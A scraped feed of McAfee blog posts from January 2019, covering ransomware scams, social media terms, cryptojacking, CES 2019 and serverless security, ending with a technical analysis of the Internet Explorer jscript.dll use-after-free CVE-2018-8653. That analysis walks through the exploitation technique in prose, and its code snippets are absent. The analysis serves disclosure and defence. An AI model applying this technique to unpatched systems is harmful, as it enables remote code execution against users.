On Monday, January 21, McAfee will join millions across the globe to recognize the life and legacy of Dr. Martin Luther King Jr. To honor the achievements of Dr. King, our McAfee African-Heritage Community (MAHC) members recently shared memorable lines from King’s iconic “I Have a Dream” speech that he delivered at the Lincoln Memorial […]

The post McAfee Honors Dr. Martin Luther King Jr. Day appeared first on McAfee Blogs.

]]>

On Monday, January 21, McAfee will join millions across the globe to recognize the life and legacy of Dr. Martin Luther King Jr.

To honor the achievements of Dr. King, our McAfee African-Heritage Community (MAHC) members recently shared memorable lines from King’s iconic “I Have a Dream” speech that he delivered at the Lincoln Memorial on August 28, 1963. The MAHC is an employee-led group that is committed to delivering education, cultural awareness, mentoring programs, community involvement and advancing diversity and inclusion within McAfee’s culture.

Watch the video here:

King shared his important message during the March on Washington for Jobs and Freedom. To provide you with the full meaning and context of King’s powerful speech, you can read the original speech in its entirety here.

McAfee is an inclusive employer and is proud to support inclusion and diversity. Interested in joining our teams? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post McAfee Honors Dr. Martin Luther King Jr. Day appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-honors-dr-martin-luther-king-jr-day/feed/ 0
Children’s Charity or CryptoMix? Details on This Ransomware Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cryptomix-ransomware-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cryptomix-ransomware-scam/#respond Wed, 16 Jan 2019 01:22:34 +0000 https://securingtomorrow.mcafee.com/?p=93839

As ransomware threats become more sophisticated, the tactics cybercriminals use to coerce payments from users become more targeted as well. And now, a stealthy strain is using deceptive techniques to mask its malicious identity. Meet CryptoMix ransomware, a strain that disguises itself as a children’s charity in order to trick users into thinking they’re making […]

The post Children’s Charity or CryptoMix? Details on This Ransomware Scam appeared first on McAfee Blogs.

]]>

As ransomware threats become more sophisticated, the tactics cybercriminals use to coerce payments from users become more targeted as well. And now, a stealthy strain is using deceptive techniques to mask its malicious identity. Meet CryptoMix ransomware, a strain that disguises itself as a children’s charity in order to trick users into thinking they’re making a donation instead of a ransom payment. While CryptoMix has used this guise in the past, they’ve recently upped the ante by using legitimate information from crowdfunding pages for sick children to further disguise this scheme.

So, how does CryptoMix trick users into making ransom payments? First, the victim receives a ransom note containing multiple email addresses to contact for payment instructions. When the victim contacts one of the email addresses, the “Worldwide Children Charity Community” responds with a message containing the profile of a sick child and a link to the One Time Secret site. This website service allows users to share a post that can only be read once before it’s deleted. CryptoMix’s developers use One Time Secret to distribute payment instructions to the victim and explain how their contribution will be used to provide medical help to sick children. The message claims that the victim’s data will be restored, and their system will be protected from future attacks as soon as the ransom is paid. In order to encourage the victim to act quickly, the note also warns that the ransom price could double in the next 24 hours.

After the victim makes the payment, the ransomware developers send the victim a link to the decryptor. However, they continue to pretend they are an actual charity, thanking the victim for their contribution and ensuring that a sick child will soon receive medical help.

CryptoMix’s scam tactics show how ransomware developers are evolving their techniques to ensure they make a profit. As ransomware threats become stealthier and more sophisticated, it’s important for users to educate themselves on the best techniques to combat these threats. Check out the following tips to help keep your data safe from ransomware:

  • Back up your data. In order to avoid losing access to your important files, make copies of them on an external hard drive or in the cloud. In the event of a ransomware attack, you will be able to wipe your computer or device and reinstall your files from the backup. Backups can’t always prevent ransomware, but they can help mitigate the risks.
  • Never pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments.
  • Use security software. Adding an extra layer of security with a solution such as McAfee Total Protection, which includes Ransom Guard, can help protect your devices from these types of cyberthreats.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Children’s Charity or CryptoMix? Details on This Ransomware Scam appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cryptomix-ransomware-scam/feed/ 0
STOP. Read T&Cs. Then Sign Up on Social Media https://securingtomorrow.mcafee.com/consumer/stop-read-tcs-then-sign-up-on-social-media/ https://securingtomorrow.mcafee.com/consumer/stop-read-tcs-then-sign-up-on-social-media/#respond Mon, 14 Jan 2019 22:04:34 +0000 https://securingtomorrow.mcafee.com/?p=93836 “Let’s start at the very beginning, A very good place to start; When you read, you begin with A-B-C, When you sign up on SM you begin by Reading T&Cs…” The start of a new year usually has a buoyant and positive feel, like you have been offered a new opportunity to start things fresh, […]

The post STOP. Read T&Cs. Then Sign Up on Social Media appeared first on McAfee Blogs.

]]>
Let’s start at the very beginning,

A very good place to start;

When you read, you begin with A-B-C,

When you sign up on SM you begin by

Reading T&Cs…”

The start of a new year usually has a buoyant and positive feel, like you have been offered a new opportunity to start things fresh, and make amends.

Experience has taught us that nothing comes for free; and that it’s always good to run a thorough background check on a new group you plan to join. This applies to social media platforms as well. When we sign up on a new social media platform, we are asked for our names, email and other personal information and then directed to the terms and conditions page which we must read and agree before we can proceed. Rarely do we read through all the terms to understand their implications; it’s mostly a cursory scan and tick to complete the signing up process as fast as possible, and voila, we are in!

However, much, much later, if we face issues like privacy breach or cyberbullying, we tend to complain that we didn’t know. But we did, it’s all spelt out in the T&Cs we had hastily agreed to.

Long ago, I had told you the story of a relative, whose son had forged his age to sign up on Facebook. When I questioned the mother, she said she wasn’t aware of the age clause. But again, it’s there, right at the start of the T&Cs!

Most social media platforms have updated their terms in recent times to bring in more openness in their advertising and third-party sharing policies. They have also clearly explained privacy and security terms for users. It’s now up to the users to read, understand and implement the terms to stay safe online and to help maintain digital world hygiene.

Let us explore the T&Cs of some popular social media sites and find out how many of the rules we allow our kids to follow or flout.

Facebook says- “You give us permission to use your name and profile picture and information about actions you have taken on Facebook next to or in connection with ads, offers, and other sponsored content that we display across our products, without any compensation to you.”

Layman’s terms- By agreeing to T&Cs,  you are automatically giving Facebook the right to the content you share in relation to ads etc. without receiving any compensation for it. For e.g., if I like a certain product, they will appear on my friends’ timeline with the message ‘Cybermum India likes it’.

Cybersafety tip: Check ad settings and maximize privacy levels.

Twitter says- “You are responsible for your use of the services and for any content you provide, including compliance with applicable laws, rules, and regulations. You should only provide content that you are comfortable sharing with others.

Layman’s terms- The user is the sole owner of content created by her or him and Twitter will take no responsibility for it.

Cybersafety tip: STOP.THINK.POST. Do not share content that may not be 100% correct or that may be intended to cause harm, hurt, or foment trouble.

Snapchat says- “Through these Terms and our Community Guidelines, we make clear that we don’t want the Services to be put to bad use. But because we don’t review all content, we cannot guarantee that content on the Services will always conform to our Terms or Guidelines.”

Layman’s terms – There may be cases of misuse of the platform by miscreants, cyberbullies and predators.

Cybersafety tip: Follow the community guidelines to know how you can let your child have a positive experience and not be accidentally exposed to inappropriate content. Ensure your teens understand they should share with you if they face disturbing behavior on the platform. It would be helpful if you activate parental controls and use term filters to block out unsavory content

Tik Tok says- “You may not access or use the Services if you are not over 13 or otherwise able to agree to these Terms.”

Layman’s terms- The minimum to sign up on the app is 13 years.

Cybersafety tip: Use this term to guide children on the right age to sign up on social media. Explain the reason behind this age criteria and allow them to sign up when they fulfil it.

Social media platforms are a great way to connect, learn and network as long as all users endeavor to keep it clean and positive. As parents, we need to arm our kids with the right skills and knowledge to help them tackle any issues that may crop up. The first step is to read and understand what the platform has to offer and its security and privacy options. This is something parents and teens can do together as it will be a useful lesson for a lifetime- both in the real and in the digital world.

And most important of all, don’t forget to secure all your devices with comprehensive security tools.
The quicker your family adopts digital safety practices, the safer they will be online!

The post STOP. Read T&Cs. Then Sign Up on Social Media appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/stop-read-tcs-then-sign-up-on-social-media/feed/ 0
We Put You at the Core https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/we-put-you-at-the-core/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/we-put-you-at-the-core/#respond Mon, 14 Jan 2019 19:00:56 +0000 https://securingtomorrow.mcafee.com/?p=93817

As we usher in the new year, I want to update you on some exciting transformations the McAfee Customer Success Group (CSG) has undergone. As a company, McAfee is committed to putting you—our customer—at the core. Our goal is to help you make the right decisions as you evolve your security maturity from device to […]

The post We Put You at the Core appeared first on McAfee Blogs.

]]>

As we usher in the new year, I want to update you on some exciting transformations the McAfee Customer Success Group (CSG) has undergone. As a company, McAfee is committed to putting you—our customer—at the core. Our goal is to help you make the right decisions as you evolve your security maturity from device to cloud and to bring you the best possible customer experience every time we interact.

McAfee uses the Net Promoter Score (NPS) to quantify customer sentiment about our brand and our products. This allows us to see customer feedback, analyze it, and make strategic decisions based on this intelligence. By listening to and acting on your input, CSG has made significant changes around people, process, technology, and offerings. These enhancements will help you make the most of your McAfee solutions so that you can successfully achieve your desired security outcomes.

We’re constantly innovating to provide cybersecurity services that align with your definition of success. The transformation changes include:

Cybersecurity Services

To help move your security goals forward, we’ve updated and developed new offerings.

McAfee Customer Success Plans

We’re now offering three unique Customer Success Plans: McAfee Premier, Enhanced, and Essential Success Plans. These plans help enterprises—of all sizes—address today’s biggest challenges: the cybersecurity talent shortage, the growing threat environment, and lack of sufficient training. The plans are a strategically packaged set of personalized services, resources, and expert guidance that help drive product adoption, reduce security risks, and maximize your investment. You can expect proactive planning, success and escalation management, consulting, and education services, and business reviews to help transform your security into a business driver. Learn more.

McAfee Education Services

The IT professionals who enforce the security policies and run the tools that protect their organizations’ data frequently lack access to the training they need. The skills shortage, combined with lack of easily accessible training, leaves organizations exposed to attacks and data loss. Our cutting-edge McAfee Education Services portfolio offers flexible product and security training options that help you stay ahead of threats, save time, and maximize your McAfee investment. We’ve added guided on-demand training, bringing the classroom training experience in a remote setting with hands-on labs access, and refreshed our product training catalog. Learn more.

McAfee Incident Response

You need to be prepared for cyberattacks. The McAfee Incident Response (IR) Service is a comprehensive offering that combines two services that prepares and strengthen your company against potential cyberattacks and gives you greater peace of mind. Our 40-hour IR readiness assessment provides you the opportunity to collaborate with McAfee security professionals to proactively build a comprehensive IR plan. You also receive 160 pre-paid emergency IR hours to use over a 12-month period. Should a cyberattack occur, you have access to McAfee security experts to help you through the crisis, saving downtime and loss of reputation. Learn more.

McAfee Corporate Support Enhancements

McAfee understands that your time is valuable. We’ve made some important changes to help you resolve issues more quickly and, ultimately, make it easier to interact with McAfee Technical Support. These enhancements include a simplified Service Request submission process, single case ownership from creation to resolution, phone lookup enhancements for direct connect to the case owner. This provides consistency and reduces the time spent on troubleshooting, ensuring your business issues are addressed. Learn more.

Self-Service Tools

To improve your digital support experience, we’ve developed several new self-service tools and resources. These include:

  • New mobile application which allows you to receive notifications and view, update, and close Services Requests.  Download to your Android or iOS mobile device from the app store
  • New portal landing pages, a central location for common resources, categorized by product, where you can get answers to your critical questions
  • Support communities where you can collaborate with liked-minded security professionals to resolve issues and share information and best practices
  • Access to a library of YouTube videos that provide “how to” support for new product features
  • Launching next month, an in-product McAfee ePO Support Center plug-in to simplify and streamline technical troubleshooting (for version 5.3 and higher)
McAfee Customer Success Group

CSG supports your aspirations. The improvements we’ve made demonstrate how we are transforming along with you. We’re listening to your needs and committed to delivering an exceptional customer experience to each of you, every time.

Advanced security solutions from McAfee are designed to detect, protect, and correct—from device to the cloud.* CSG helps you optimize those security solutions so that you can innovate fearlessly, proactively protect your business, and scale up in line with your timeframe.  We look forward to working closely with you to accomplish your near-term and long-term security and business goals. As we’re accustomed to saying around here, “Together Is Power.”

To find out how we can help you reach your security goals, visit the “Learn More” links above or contact your sales account manager or partner.

 

 

*McAfee technologies’ features and benefits depend on system configuration and may require enabled hardware, software, or service activation. No connected environment can be absolutely secure.

The post We Put You at the Core appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/we-put-you-at-the-core/feed/ 0
Cryptojacking Up 4,000% How You Can Block the Bad Guys https://securingtomorrow.mcafee.com/consumer/family-safety/cryptojacking-up-4000-how-you-can-block-the-bad-guys/ https://securingtomorrow.mcafee.com/consumer/family-safety/cryptojacking-up-4000-how-you-can-block-the-bad-guys/#respond Sat, 12 Jan 2019 15:00:30 +0000 https://securingtomorrow.mcafee.com/?p=93718 Think about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick […]

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

]]>
Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/cryptojacking-up-4000-how-you-can-block-the-bad-guys/feed/ 0
That’s a Wrap! Read the Top Technology Takeaways From CES 2019 https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019/#respond Sat, 12 Jan 2019 00:16:11 +0000 https://securingtomorrow.mcafee.com/?p=93785

The sun has finally set on The International Consumer Electronics Show (CES) in Las Vegas. Every year, practically everyone in the consumer electronics industry comes from all over to show off the latest and greatest cutting-edge innovations in technology. From flying taxis, self-driving suitcases, and robots that will fold your laundry, CES 2019 did not […]

The post That’s a Wrap! Read the Top Technology Takeaways From CES 2019 appeared first on McAfee Blogs.

]]>

The sun has finally set on The International Consumer Electronics Show (CES) in Las Vegas. Every year, practically everyone in the consumer electronics industry comes from all over to show off the latest and greatest cutting-edge innovations in technology. From flying taxis, self-driving suitcases, and robots that will fold your laundry, CES 2019 did not disappoint. Here are some of my main takeaways from the event:

5G is the future

It seems that anyone and everyone who attended the event was talking about 5G. However, there wasn’t exactly a definitive answer to when the service would be available to consumers. According to Forbes, 5G is an abbreviation that stands for the fifth generation of the cellular wireless transmission. And while many companies at CES discussed 5G, the number of products that are actually capable of tapping into the network is minimal. This doesn’t mean we shouldn’t get excited about 5G. The faster connection, speed, and responsiveness of the 5G network will help enable IoT, autonomous driving, and technology that hasn’t even been invented yet.

Gaming gets an upgrade

Gamers everywhere are sure to enjoy the exciting new gadgets that launched this year. From wireless charging grips for the Nintendo Switch to curved monitors for better peripheral vision, tech companies across the board seemed to be creating products to better the gaming experience. In addition to products that are enhancing gamer’s capabilities, we also saw gaming products that are bringing the digital world closer to reality. For example, Holoride partnered with Disney and Audi to create a Guardians of the Galaxy virtual reality (VR) experience for car passengers that mimics the movements of the vehicle.

Optimized IoT devices, AI-driven assistants

This year’s event was colored with tons of new smart home and health IoT technology. Although smart home technology made a big splash at last year’s show, CES 2019 focused on bringing more integrated smart home products to consumers. For example, the AtmosControl touch panel acts as a simplified universal remote so consumers can control all of their gadgets from a single interface. We also saw the Bowflex Intelligent Max, a platform that allows consumers to download an app to complete Bowflex’s fitness assessment and adjust their workout plan based on the results.

Voice assistants seemed to dominate this year’s show, as well. Google and Amazon upped the ante with their use of improved AI technology for the Google Assistant and Amazon Alexa. Not only has Google brought Google Assistant to Google Maps, but they’ve also created a Google Assistant Interpreter Mode that works in more than 20 languages. Not to be shown up, Amazon announced some pretty intriguing Alexa-enabled products as well, including the Ring Door View Cam, a smart shower system called U by Moen, and the Numi 2.0 Intelligent Toilet.

The takeoff of autonomous vehicles

Not only did AI guide new innovations in IoT device technology, but it also paved the way for some futuristic upgrades to vehicles. Mercedes showcased their self-driving car called the Vision Urbanetic, an AI-powered concept vehicle that can hold up to 12 people. BMW created a rider-less motorcycle designed to gather data on how to make motorcycles safer on the road. And we can’t forget about Uber’s futuristic flying taxi, created in partnership with Bell Nexus, and expected to take flight in 2020.

Cybersecurity’s role in the evolving technological landscape

At McAfee, we understand the importance of securing all of these newfangled IoT gadgets that make their way into consumers’ homes. To do this, we announced the launch of Secure Home Platform voice commands for the Google Assistant, allowing users to keep track of their entire network through one interface.

To reflect the upgrades in gaming technology, we also launched the beta mode of McAfee Gamer Security. Many antivirus solutions are notorious for slowing down PCs, which can really hinder the gaming experience. This security solution, designed for PC gamers, provides a light but mighty layer of protection that optimizes users’ computing resources.

If there’s one thing we took away from this year’s event, it’s that technological innovations won’t be slowing down any time soon. With all of these new advancements and greater connectivity comes the need for increased cybersecurity protection. All in all, CES 2019 showed us that as software and hardware continues to improve and develop, cybersecurity will also adapt to the needs of everyday consumers.

Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post That’s a Wrap! Read the Top Technology Takeaways From CES 2019 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019/feed/ 0
The Shifting Risk Profile in Serverless Architecture https://securingtomorrow.mcafee.com/business/cloud-security/the-shifting-risk-profile-in-serverless-architecture/ https://securingtomorrow.mcafee.com/business/cloud-security/the-shifting-risk-profile-in-serverless-architecture/#respond Fri, 11 Jan 2019 16:00:49 +0000 https://securingtomorrow.mcafee.com/?p=93675

Technology is as diverse and advanced as ever, but as tech evolves, so must the way we secure it from potential threats. Serverless architecture, i.e. AWS Lambda, is no exception. As the rapid adoption of this technology has naturally grown, the way we approach securing it has to shift. To dive into that shift, let’s […]

The post The Shifting Risk Profile in Serverless Architecture appeared first on McAfee Blogs.

]]>

Technology is as diverse and advanced as ever, but as tech evolves, so must the way we secure it from potential threats. Serverless architecture, i.e. AWS Lambda, is no exception. As the rapid adoption of this technology has naturally grown, the way we approach securing it has to shift. To dive into that shift, let’s explore the past and present of serverless architecture’s risk profile and the resulting implications for security.

Past

For the first generation of cloud applications, we implemented “traditional” approaches to security. Often, this meant taking the familiar “Model-View-Controller” view to initially segment the application, and sometimes we even had the foresight to apply business logic separation to further secure the application.

But our cloud security model was not truly “cloud-native.”  That’s because our application security mechanisms assumed that traffic functioned in a specific way, with specific resources. Plus, our ability to inspect and secure that model relied on an intimate knowledge of how the application worked, and the full control of security resources between its layers. In short, we assumed full control of how the application layers were segmented, thus replicating our data center security in the cloud, giving up some of the economics and scale of the cloud in the process.

Figure 2. Simplified cloud application architecture separated by individual functions.

Present

Now, when it comes to the latest generation of cloud applications, most leverage Platform-as-a-Service (PaaS) functions as an invaluable aid in the quest to reduce time-to-market. Essentially, this means getting back to the original value proposition for making the move to cloud in the first place.

And many leaders in the space are already making major headway when it comes to this reduction. Take Microsoft as an example, which cited a 67% reduction in time-to-market for their customer Quest Software by using Microsoft Azure services. Then there’s Oracle, which identified 50% reduction in time-to-market for their customer HEP Group using Oracle Cloud Platform services.

However, for applications built with Platform-as-a-Service, we have to think about risk differently. We must ask ourselves — how do we secure the application when many of the layers between the “blocks” of serverless functions are under cloud service provider (CSP) control and not your own?

Fortunately, there are a few things we can do. We can start by having the architecture of the application become a cornerstone of information security. From there, we must ask ourselves, do the elements relate to each other in a well understood, well-modeled way?  Have we considered how they can be induced to go wrong? Given that our instrumentation is our source of truth, we need to ensure that we’re always in the know when something does go wrong – which can be achieved through a combination of CSP and 3rd party tools.

Additionally, we need to look at how code is checked and deployed at scale and look for opportunities to complete side by side testing. Plus, we must always remember that DevOps, without answering basic security questions, can often unwittingly give away data in any release.

It can be hard to shoot a moving target. But if security strategy can keep pace with the shifting risk profile of serverless architecture, we can reap the benefits of cloud applications without worry. Then, serverless architecture will remain both seamless and secure.

The post The Shifting Risk Profile in Serverless Architecture appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/the-shifting-risk-profile-in-serverless-architecture/feed/ 0
IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/#respond Thu, 10 Jan 2019 23:27:28 +0000 https://securingtomorrow.mcafee.com/?p=93699

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received […]

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

]]>

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE 2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the version of jscript.dll for Windows 10, x64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE 2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually design a template to keep track of references pointing to the object being used, so those do not have garbage collection. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are on those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scene. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false if the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:

 

 

Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

